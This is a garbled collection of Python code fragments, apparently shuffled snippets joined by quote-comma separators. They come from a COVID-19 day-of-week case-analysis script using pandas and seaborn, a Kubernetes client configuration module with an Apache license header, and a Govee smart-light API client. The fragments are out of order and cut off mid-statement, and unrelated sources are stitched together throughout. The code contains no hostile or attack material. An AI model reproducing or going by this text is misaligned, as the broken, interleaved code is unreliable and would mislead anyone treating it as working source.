fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig =", "# Debug data frame. DEBUG and preview(df, add_columns.__name__) # Return data frame for", "= [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ] # -- Debugging", "'Robert (Bob) <NAME>' __credits__ = ['Robert (Bob) <NAME>'] __created_date__ = 'Sep 16, 2020'", "(classes, # functions, etc.) -- when performing a \"wild import\" (`from field import", "= df.index.month df['week'] = df.index.week df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add", "as sns # =========================================================================== # # CONSTANTS # =========================================================================== # # -- Data", "New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly Count of Cases') #", "Week') ax.set_ylabel('Count of Local Maxima of Cases') # Debug data frame. DEBUG and", "= df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, ) df", "#!/usr/bin/env python3 \"\"\" main.py - The main module for processing data and creating", "# =========================================================================== # # MAIN EXECUTION # =========================================================================== # # -- Main Program", "and preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax", "New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local Maxima of Cases') #", "def zScore(x, mean, std): return (x - mean) / std # -- Main", "def lag_delta(series, period): return series - series.shift(period) def lead_delta(series, period): return series.shift(-period) -", "columns. df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add local extrema", "= [ 'DEBUG', ] # =========================================================================== # # IMPORTS # =========================================================================== # #", "-- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS # =========================================================================== #", "summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW,", "data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily", "plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA", "Debug data frame. DEBUG and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame):", "data frame for reuse. return df def rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename", "f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data frame. DEBUG and preview(df, add_columns.__name__) # Return", "Weekly Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) #", "frame for reuse. return df def rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename columns.", "when performing a \"wild import\" (`from field import *`). __all__ = [ 'DEBUG',", "data frame for reuse. return df def add_columns(df: pd.DataFrame): # Format date. df.date", "Data Processing: Load -- # # -- Utilities -- # def lag_delta(series, period):", "axis=1) df['localMinimum'] = df.apply(local_min, axis=1) # Save a copy of the processed data.", "main.py - The main module for processing data and creating visual summaries for", "transform_data.__name__) # Return data frame for reuse. return df def add_columns(df: pd.DataFrame): #", "<NAME>'] __created_date__ = 'Sep 16, 2020' __modified_date__ = 'Sep 16, 2020' # ===========================================================================", ") # Debug data frame. DEBUG and preview(df, extract_data.__name__) # Return data frame", "data as CSV from an API. df = pd.read_csv(SOURCE_URL) # Save a copy", "# def plot_series(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), )", "Week') ax.set_ylabel('Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow.__name__) #", "=========================================================================== # # -- Data -- # DAILY = 'daily' WEEKLY = 'weekly'", "ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020", "copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data frame.", "Party -- # import matplotlib.dates as mpl_dates import matplotlib.pyplot as plt import pandas", "= plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 |", "= plt.figure() ax = plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 | Year", "= df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1) # Save a copy of the", "rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111)", "df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add local extrema columns.", "data frame. DEBUG and preview(df, add_columns.__name__) # Return data frame for reuse. return", "ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020", "-- Debugging -- # DEBUG = True # -- Filesytem -- # ROOT_DIR", "DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure()", "'DEBUG', ] # =========================================================================== # # IMPORTS # =========================================================================== # # -- Python", "# Return data frame for reuse. return df # -- Data Processing: Extract", "plt.figure() ax = plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 | Year 2020", "x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New", "denom def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5)) def", "-- # ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR = '../results' #", "rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS, inplace=True) # Save a copy", "row['day1LeadDelta'] < 0: return True else: return False def local_min(row): if row['day1LagDelta'] <", "y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive", "date. df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set the date as the DataFrame's index.", "group-summarization columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std',", "# Debug data frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df:", "df = transform_data(df) visualize_data(df) # =========================================================================== # # MAIN EXECUTION # =========================================================================== #", "as the DataFrame's index. df = df.set_index('date') # Add date-derived columns. df['date'] =", "# Add group-summarization columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean',", "'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ] # -- Debugging -- # DEBUG =", "-- when performing a \"wild import\" (`from field import *`). __all__ = [", "} DOW = [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ] #", "New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show() # Debug data", "str): print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5)) def zScore(x, mean, std): return (x", "def main(): df = extract_data() df = transform_data(df) visualize_data(df) # =========================================================================== # #", "| USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly", "for this study. \"\"\" # =========================================================================== # # METADATA # =========================================================================== # __author__", "= plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA", "df.index.date df['year'] = df.index.year df['month'] = df.index.month df['week'] = df.index.week df['dow'] = df.index.day_name()", "DEBUG and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df)", "df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, ) df =", "frame for reuse. return df def add_columns(df: pd.DataFrame): # Format date. df.date =", "fig = plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date', y='posIncrease',", "CSV from an API. df = pd.read_csv(SOURCE_URL) # Save a copy of the", "# # FUNCTIONS # =========================================================================== # # -- Data Analytics -- # def", "summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, )", "date-derived columns. df['date'] = df.index.date df['year'] = df.index.year df['month'] = df.index.month df['week'] =", "frame for reuse. return df # -- Data Processing: Extract -- # def", "Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def", "from an API. df = pd.read_csv(SOURCE_URL) # Save a copy of the extracted", "Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set the date as the DataFrame's", "lead_delta(series, period): return series.shift(-period) - series def local_max(row): if row['day1LagDelta'] > 0 and", "USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly Count", "Cases') ax.xaxis_date() # plt.show() # Debug data frame. DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png')", "| Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases') # Debug", "# =========================================================================== # # IMPORTS # =========================================================================== # # -- Python Standard Library", "x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New", "plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA", "def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease',", "# -- Data Processing: Extract -- # def extract_data() -> pd.DataFrame: # Download", "'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, ) df = pd.merge( df, df_weekly, how='left', on='week',", "copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data frame.", "import matplotlib.dates as mpl_dates import matplotlib.pyplot as plt import pandas as pd import", "pd.DataFrame) -> pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS, inplace=True) # Save a copy of", "pd.read_csv(SOURCE_URL) # Save a copy of the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, )", "period): return series.shift(-period) - series def local_max(row): if row['day1LagDelta'] > 0 and row['day1LeadDelta']", "add_columns.__name__) # Return data frame for reuse. return df def rename_columns(df: pd.DataFrame) ->", "matplotlib.dates as mpl_dates import matplotlib.pyplot as plt import pandas as pd import seaborn", ") ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Date')", "pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date',", "| Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly Count of", "return (x - mean) / std # -- Main Program -- # def", "# import os # -- 3rd Party -- # import matplotlib.dates as mpl_dates", "preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax =", "=========================================================================== # # MAIN EXECUTION # =========================================================================== # # -- Main Program --", "'stdWeeklyPosIncrease': 'std', }, ) df = pd.merge( df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease']", "# -- 3rd Party -- # import matplotlib.dates as mpl_dates import matplotlib.pyplot as", "-- # # -- Utilities -- # def lag_delta(series, period): return series -", "__modified_date__ = 'Sep 16, 2020' # =========================================================================== # # EXPORTS # =========================================================================== #", "ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count", "data frame. DEBUG and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults()", "# Debug data frame. DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df:", "summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. DEBUG and preview(df, visualize_data.__name__) #", "local_min(row): if row['day1LagDelta'] < 0 and row['day1LeadDelta'] > 0: return True else: return", "pd.merge( df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore(", "= 'Robert (Bob) <NAME>' __credits__ = ['Robert (Bob) <NAME>'] __created_date__ = 'Sep 16,", "ax = plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 | Year 2020 |" ]
[ "# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you", "writing, software # distributed under the License is distributed on an \"AS IS\"", "verify the servers SSL certificates? verify_ssl = True #: Enable debugging debug =", "api_token = \"\" #: API certificate cert = None #: Should the client", "KIND, either express or implied. # See the License for the specific language", "Unless required by applicable law or agreed to in writing, software # distributed", "\"\" #: API certificate cert = None #: Should the client verify the", "You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "# See the License for the specific language governing permissions and # limitations", "token api_token = \"\" #: API certificate cert = None #: Should the", "client verify the servers SSL certificates? verify_ssl = True #: Enable debugging debug", "utf-8 # Copyright 2017-2019 The FIAAS Authors # # Licensed under the Apache", "License. # You may obtain a copy of the License at # #", "most operations timeout = 20 #: Default timeout for streaming operations stream_timeout =", "the specific language governing permissions and # limitations under the License. \"\"\"Singleton configuration", "# limitations under the License. \"\"\"Singleton configuration for k8s client\"\"\" #: API server", "URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token api_token = \"\" #: API certificate", "law or agreed to in writing, software # distributed under the License is", "# Copyright 2017-2019 The FIAAS Authors # # Licensed under the Apache License,", "the License for the specific language governing permissions and # limitations under the", "License. \"\"\"Singleton configuration for k8s client\"\"\" #: API server URL api_server = \"https://kubernetes.default.svc.cluster.local\"", "compliance with the License. # You may obtain a copy of the License", "Authors # # Licensed under the Apache License, Version 2.0 (the \"License\"); #", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "this file except in compliance with the License. # You may obtain a", "certificate cert = None #: Should the client verify the servers SSL certificates?", "Default timeout for streaming operations stream_timeout = 3600 #: Default size of Watcher", "the Apache License, Version 2.0 (the \"License\"); # you may not use this", "API server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token api_token = \"\" #:", "you may not use this file except in compliance with the License. #", "the servers SSL certificates? verify_ssl = True #: Enable debugging debug = False", "API token api_token = \"\" #: API certificate cert = None #: Should", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "True #: Enable debugging debug = False #: Default timeout for most operations", "limitations under the License. \"\"\"Singleton configuration for k8s client\"\"\" #: API server URL", "FIAAS Authors # # Licensed under the Apache License, Version 2.0 (the \"License\");", "ANY KIND, either express or implied. # See the License for the specific", "-*- coding: utf-8 # Copyright 2017-2019 The FIAAS Authors # # Licensed under", "debugging debug = False #: Default timeout for most operations timeout = 20", "in compliance with the License. # You may obtain a copy of the", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "the client verify the servers SSL certificates? verify_ssl = True #: Enable debugging", "language governing permissions and # limitations under the License. \"\"\"Singleton configuration for k8s", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #", "use this file except in compliance with the License. # You may obtain", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "not use this file except in compliance with the License. # You may", "\"https://kubernetes.default.svc.cluster.local\" #: API token api_token = \"\" #: API certificate cert = None", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See", "Should the client verify the servers SSL certificates? verify_ssl = True #: Enable", "None #: Should the client verify the servers SSL certificates? verify_ssl = True", "#: API token api_token = \"\" #: API certificate cert = None #:", "False #: Default timeout for most operations timeout = 20 #: Default timeout", "timeout for most operations timeout = 20 #: Default timeout for streaming operations", "See the License for the specific language governing permissions and # limitations under", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "License, Version 2.0 (the \"License\"); # you may not use this file except", "operations stream_timeout = 3600 #: Default size of Watcher cache watcher_cache_size = 1000", "# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may", "= None #: Should the client verify the servers SSL certificates? verify_ssl =", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "governing permissions and # limitations under the License. \"\"\"Singleton configuration for k8s client\"\"\"", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in", "for the specific language governing permissions and # limitations under the License. \"\"\"Singleton", "#: Should the client verify the servers SSL certificates? verify_ssl = True #:", "k8s client\"\"\" #: API server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token api_token", "servers SSL certificates? verify_ssl = True #: Enable debugging debug = False #:", "OF ANY KIND, either express or implied. # See the License for the", "2.0 (the \"License\"); # you may not use this file except in compliance", "cert = None #: Should the client verify the servers SSL certificates? verify_ssl", "#!/usr/bin/env python # -*- coding: utf-8 # Copyright 2017-2019 The FIAAS Authors #", "= False #: Default timeout for most operations timeout = 20 #: Default", "# you may not use this file except in compliance with the License.", "#: Default timeout for most operations timeout = 20 #: Default timeout for", "\"\"\"Singleton configuration for k8s client\"\"\" #: API server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #:", "client\"\"\" #: API server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token api_token =", "permissions and # limitations under the License. \"\"\"Singleton configuration for k8s client\"\"\" #:", "agreed to in writing, software # distributed under the License is distributed on", "server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token api_token = \"\" #: API", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the", "the License. \"\"\"Singleton configuration for k8s client\"\"\" #: API server URL api_server =", "(the \"License\"); # you may not use this file except in compliance with", "#: Enable debugging debug = False #: Default timeout for most operations timeout", "= True #: Enable debugging debug = False #: Default timeout for most", "specific language governing permissions and # limitations under the License. \"\"\"Singleton configuration for", "# # Unless required by applicable law or agreed to in writing, software", "express or implied. # See the License for the specific language governing permissions", "Version 2.0 (the \"License\"); # you may not use this file except in", "# Unless required by applicable law or agreed to in writing, software #", "except in compliance with the License. # You may obtain a copy of", "= \"https://kubernetes.default.svc.cluster.local\" #: API token api_token = \"\" #: API certificate cert =", "by applicable law or agreed to in writing, software # distributed under the", "verify_ssl = True #: Enable debugging debug = False #: Default timeout for", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "coding: utf-8 # Copyright 2017-2019 The FIAAS Authors # # Licensed under the", "debug = False #: Default timeout for most operations timeout = 20 #:", "= 20 #: Default timeout for streaming operations stream_timeout = 3600 #: Default", "either express or implied. # See the License for the specific language governing", "<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 # Copyright 2017-2019 The FIAAS Authors", "software # distributed under the License is distributed on an \"AS IS\" BASIS,", "#: API server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token api_token = \"\"", "configuration for k8s client\"\"\" #: API server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API", "2017-2019 The FIAAS Authors # # Licensed under the Apache License, Version 2.0", "may not use this file except in compliance with the License. # You", "# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "Enable debugging debug = False #: Default timeout for most operations timeout =", "Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to", "Copyright 2017-2019 The FIAAS Authors # # Licensed under the Apache License, Version", "Default timeout for most operations timeout = 20 #: Default timeout for streaming", "file except in compliance with the License. # You may obtain a copy", "under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "License for the specific language governing permissions and # limitations under the License.", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "the License. # You may obtain a copy of the License at #", "to in writing, software # distributed under the License is distributed on an", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "# distributed under the License is distributed on an \"AS IS\" BASIS, #", "The FIAAS Authors # # Licensed under the Apache License, Version 2.0 (the", "implied. # See the License for the specific language governing permissions and #", "#: Default timeout for streaming operations stream_timeout = 3600 #: Default size of", "\"License\"); # you may not use this file except in compliance with the", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "required by applicable law or agreed to in writing, software # distributed under", "for most operations timeout = 20 #: Default timeout for streaming operations stream_timeout", "timeout for streaming operations stream_timeout = 3600 #: Default size of Watcher cache", "= \"\" #: API certificate cert = None #: Should the client verify", "under the License. \"\"\"Singleton configuration for k8s client\"\"\" #: API server URL api_server", "applicable law or agreed to in writing, software # distributed under the License", "and # limitations under the License. \"\"\"Singleton configuration for k8s client\"\"\" #: API", "python # -*- coding: utf-8 # Copyright 2017-2019 The FIAAS Authors # #", "SSL certificates? verify_ssl = True #: Enable debugging debug = False #: Default", "for streaming operations stream_timeout = 3600 #: Default size of Watcher cache watcher_cache_size", "or agreed to in writing, software # distributed under the License is distributed", "operations timeout = 20 #: Default timeout for streaming operations stream_timeout = 3600", "or implied. # See the License for the specific language governing permissions and", "certificates? verify_ssl = True #: Enable debugging debug = False #: Default timeout", "distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT", "CONDITIONS OF ANY KIND, either express or implied. # See the License for", "Apache License, Version 2.0 (the \"License\"); # you may not use this file", "api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token api_token = \"\" #: API certificate cert", "OR CONDITIONS OF ANY KIND, either express or implied. # See the License", "may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "streaming operations stream_timeout = 3600 #: Default size of Watcher cache watcher_cache_size =", "with the License. # You may obtain a copy of the License at", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,", "for k8s client\"\"\" #: API server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token", "#: API certificate cert = None #: Should the client verify the servers", "API certificate cert = None #: Should the client verify the servers SSL", "in writing, software # distributed under the License is distributed on an \"AS", "20 #: Default timeout for streaming operations stream_timeout = 3600 #: Default size", "timeout = 20 #: Default timeout for streaming operations stream_timeout = 3600 #:", "# -*- coding: utf-8 # Copyright 2017-2019 The FIAAS Authors # # Licensed", "under the Apache License, Version 2.0 (the \"License\"); # you may not use" ]
[ "remaining, sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit is", "and _RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET in response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL])", "None device_str, device = self._get_device(device) if not device: err = f\"Invalid device {device_str},", "_RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET in response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining", "await self._learn(device) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow", "within n seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object):", "device from cache.\"\"\" _, device = self._get_device(device) return device @property def online(self): \"\"\"Last", "= devices return self.devices, err def _get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]:", "prop in json_obj[\"data\"][\"properties\"]: # somehow these are all dicts with one element if", "result = self._devices[device_str] _LOGGER.debug( f\"state object returned from cache: {result}, next state for", "to API.\"\"\" try: # this will set self.online await self.ping() except: pass return", "self.config_offline_is_off is not None: # global option if self.config_offline_is_off: prop_power_state = False elif", "def close(self): \"\"\"Use close when your are finished with the Client without using", "] = await self._learning_storage._read_cached() changed = False # init Dict and entry for", "limiting. Defaults to 5, which means there is some room for other clients.", "else: result = await response.text() err = f\"API-Error {response.status}: {result}\" return ping_ok_delay, err", "0: brightness_set_100 = max(1, math.floor(brightness * 100 / 254)) brightness_result_100 = math.ceil(brightness_set_100 *", "f\"Rate limiting active, {self._limit_remaining} of {self._limit} remaining, sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec)", "self.online async def ping(self) -> Tuple[float, str]: \"\"\"Ping the api endpoint. No API_KEY", "close(self): \"\"\"Use close when your are finished with the Client without using an", "except: pass return self.online async def ping(self) -> Tuple[float, str]: \"\"\"Ping the api", "request_lambda): \"\"\"API Methond handling all HTTP calls. This also handles: - rate-limiting -", "{text} for device {device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") return result, err async", "one specific device.\"\"\" device_str, device = self._get_device(device) result = None err = None", "we just changed something, return state from history self._devices[device_str].source = \"history\" result =", "with (r, g, b) values\" else: red = color[0] green = color[1] blue", "device_str, device = self._get_device(device) result = None err = None seconds_locked = self._get_lock_seconds(device.lock_get_until)", "self._limit_reset = 0 self._config_offline_is_off = None self._learning_storage = learning_storage if not self._learning_storage: #", "item[\"retrievable\"] # assuming defaults for learned/configured values learned_set_brightness_max = None learned_get_brightness_max = None", "message.\"\"\" return await self._turn(device, \"off\") async def _turn( self, device: Union[str, GoveeDevice], onOff:", "# do not send another control within n seconds after controlling the device", "from cache.\"\"\" _, device = self._get_device(device) return device @property def online(self): \"\"\"Last request", "red = color[0] green = color[1] blue = color[2] if red < 0", "254: err = f\"set_brightness: invalid value {brightness}, allowed range 0 .. 254\" else:", "brightness_set > 100: device.learned_set_brightness_max = 254 await self._learn(device) if not err: success =", "params=None): \"\"\"API HTTP Get call.\"\"\" async with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params", "learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result = await response.text() err = f\"API-Error", "_LOGGER.debug( \"learned device %s uses range 0-%s for getting brightness state.\", device.device, device.learned_get_brightness_max,", "= -1 if model_str == \"H6104\": before_set_brightness_turn_on = True # load learned/configured values", "< 2000 or color_temp > 9000: err = f\"set_color_temp: invalid value {color_temp}, allowed", "seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device: err = f\"Invalid device {device_str}\" elif not", "if self.config_offline_is_off is not None: # global option if self.config_offline_is_off: prop_power_state = False", "option if self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off: # learning option prop_power_state =", "= onOff result, err = await self._control(device, command, params) success = False if", "= self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self, result) -> bool:", "call count for multiple processes self._limit = 100 self._limit_remaining = 100 self._limit_reset =", "not device: err = f\"Invalid device {device_str}, {device}\" else: if not device.controllable: err", "limit total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False except", "None: # global option if self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off: # learning", "def rate_limit_reset(self): \"\"\"UTC time in seconds when the rate limit will be reset.\"\"\"", "text(self): return self._err_msg yield error_response(\"_api_request_internal: \" + err) def _utcnow(self): \"\"\"Helper method to", "support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for state", "async def check_connection(self) -> bool: \"\"\"Check connection to API.\"\"\" try: # this will", "aiohttp.ClientSession() return self async def __aexit__(self, *err): \"\"\"Async context manager exit.\"\"\" if self._session:", "something, return state from history self._devices[device_str].source = \"history\" result = self._devices[device_str] _LOGGER.debug( f\"state", "- self._utcnow() if seconds_lock < 0: seconds_lock = 0 return seconds_lock async def", "_api_get(self, *, auth=True, url: str, params=None): \"\"\"API HTTP Get call.\"\"\" async with self._api_request_internal(", "err: device.learned_set_brightness_max = 100 await self._learn(device) else: if brightness_set > 100: device.learned_set_brightness_max =", "HTTP Put call.\"\"\" async with self._api_request_internal( lambda: self._session.put( url=url, 